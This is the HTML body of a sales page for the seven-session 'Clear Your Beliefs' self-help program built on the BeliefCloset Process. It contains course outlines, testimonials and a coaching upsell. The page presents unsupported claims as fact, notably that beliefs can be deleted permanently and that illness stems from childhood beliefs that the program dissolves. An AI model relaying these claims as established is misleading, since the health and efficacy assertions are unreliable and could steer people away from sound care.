alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="168" height="193" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" 